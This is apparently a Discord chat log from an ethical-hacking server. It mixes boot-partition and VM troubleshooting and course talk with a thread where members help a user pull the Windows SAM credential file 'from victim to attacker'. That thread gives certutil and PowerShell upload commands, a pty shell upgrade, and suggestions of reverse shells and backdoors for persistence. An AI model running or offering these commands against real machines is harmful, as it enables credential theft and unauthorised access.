.rwxr-xr-x 52M root 7 Sep 16:14 initramfs-linux.img
.rwxr-xr-x 8.1M root 15 Aug 09:05 intel-ucode.img
.rwxr-xr-x 206k root 5 Sep 10:13 limine-bios.sys
.rwxr-xr-x 418 root 11 Jul 23:26 limine.cfg
.rwxr-xr-x 13M root 5 Sep 10:12 vmlinuz-linux
You can use https://imgur.com to upload
the bot just deleted my message can we hop in vc
If your problem persist update in help here and someone will surely help you get it sorted
I don’t know what the situation is that you’re experiencing.
I'm in DM with him
His boot partition is too small, he'll be running into the same problems in the future.
Recommended him to resize his boot partition
Its on ark servival evolved
We also have a discord lol but hes treathing to hit the game servers
I'm sorry i dident respond i pretty much fell asleep after banning most of his accounts
What happens when you power it on?
On some old pcs. Bios can still display without RAM
Nice!
Okie
Good to know
ok quick help
??
Windows File Transfers For Hackers
gimme something
👀
I'm not a windows specialist.
@lean lance
damn
Isn't that like SMB or smth??
nah there is more
i cnat use smb
idk.
certutil, bitsadmin
certutil
powershell
need to trnafer from victim to attacker
gimme commnds kindly
nc
certutil -urlcache -f http://example.com/file.exe file.exe
oh then you can just use wormhole if you have GUI access
or if you have CLI
you could use FTP
or Netcat
trying smb
machine bricked
😭
Ouch
got something
Same network?
yes
what shell do you have ?
python3 -m http.server 8080 On kaili | certutil -urlcache -split -f http://0.0.0.0:8080/filename.exe C:\path\to\save\coolthing.exe on windows machine
this will upload the file to your attacker machine
you can also use powershell
What if he wants a permanent connection so he can just come and take whatever he wants
Thanks for the info red
Shit. Sounds illegal💀
python -c 'import pty;pty.spawn("/bin/bash");'
stty raw -echo
fg
thats for a fully interactive shell
014f
CertUtil: -URLCache command FAILED: 0x80190194 (-2145844844 HTTP_E_STATUS_NOT_FOUND)
CertUtil: Not found (404).
as for a permanent connection to take whatever I'm sure he could use VNC or install it on the machine then just use the file transfer function, or he could use a backdoor that has upload and down load capability's
command is failing because it's trying to download a file that doesn't exist thats what that means
404 Not Found
hmmm check the permisions then double check
certutil -urlcache -split -f http://10.17.3470:8080/SAM C:\Windows\Repairs\SAM
this is what
@fickle mauve is netcat preinstalled in win
nope
no
hmmmm where is that sam file located on your kali machine
make sure that's the right path
and you have the HTTP server with python running on that machine
sam file is on windows i need to get it to kali
yes but that first part
victim -> attacker transfer
is your kali path that you are uploading to
if that folder does not exist it's not going to upload it
ok
becasue it's no there
hmm so what we do
Can't he just replace the path with an existing one
^
or you can use powershell if that's not working
powershell -c "(New-Object System.Net.WebClient).UploadFile('http://10.17.52.70:8080/file.exe', 'C:\path\to\file.exe')"
also are you tranfering a file
or folder?
I need to get like you guys. Need to keep study going. @chilly merlin I started the Network academy you sent and really liking it.
That's really good.
How far with it?
become a delusional mf like me
Serpent
just get Metasploit reverse shell on the machine
He's on leave : (
Certutil -urlcache -split -f http://10.17.52.:8080/root/SAM "C:\Windows\Repair\SAM"
On leave
then dump it through metasploit
Just 1 more month than I will be fakin active
@chilly merlin I'd say look more into what you are doing what tools are available to you and think outside the box there might be another way. I'm not really a pentester lol just for a hobbie
Module 4 in the intro cybersecurity taking it slow but finding it interesting
jus a hobby and whooping our ass 
Not really lol I failed to help you out
That's skillsforall?
Whats that.
Cisco's networking Academy
Ohh. Nope
It's basically the skills for all but paid and only for schools verified to be cisco academy's
Nahh
@chilly merlin im not fully sure Im just going through all the courses they offer for free. "full free online courses" on the network academy. I started out with the first course I saw which was cybersecurity intro
Okie
Isn't called "Introduction to Cybersecurity"
?
If so I remember the courses by heart lol
also looked like they did merge netacad and skills for all
that's new
And better
yes that is the course name
ahh they still have the old interface good
I need to remember by heart now to lol
The legacy NetAcad experience is available for completing courses that were opened on NetAcad.com prior to 22 August 2024 only.
For the latest courses, program news, and up-to-date information, use the new NetAcad.com experience.
lol CCST is still around and cheaper
Okay Ill make sure I use that site. thank you!
does anybody here work with softwares like silverbullets and deals with configs and combolists ?
If so I need help learning to make configs or just need configs if anyone has spare ones.
we don't do unethical things here we are a ethical hacking server sorry
Ah alright my bad
Hey guys,
Is it possible to fix the Kali linux boot animation while using gdm3 display manager?...if there any ways to fix this please help
can any help me find vmware workstation download
its been a while and want to get back into cyber security
wait a minhttps://www.youtube.com/watch?v=zfxhatOGWWE
VMware Workstation 17 PRO is the best Virtualization tool to use due to it's broad features and now it's FREE to use for personal use.
Workstation PRO for personal use is free but if you plan to use in a production environment this will still requires a paid subscription
So in order to download Workstation Pro for personal use you have to creat...
please change the profile pic for this server
w thank u
inappropriate
jakuzek 👀 yall lurkers
how are u
good sec+
You will either change it or you can get the boot. Your choice.
is there a dif way to get a virutal machine
wat
is there a dif virtual machine u perfer
machine
or software
to run vms
virtualbox
purpose
get back into learning cyber securty
kali parrot arch
kali
¯_(ツ)_/¯
i forgot its been to long
okay
so trieed to resize my partitions\
wiped my whole pc
...
worst mistake ever...god help me
what os are running?


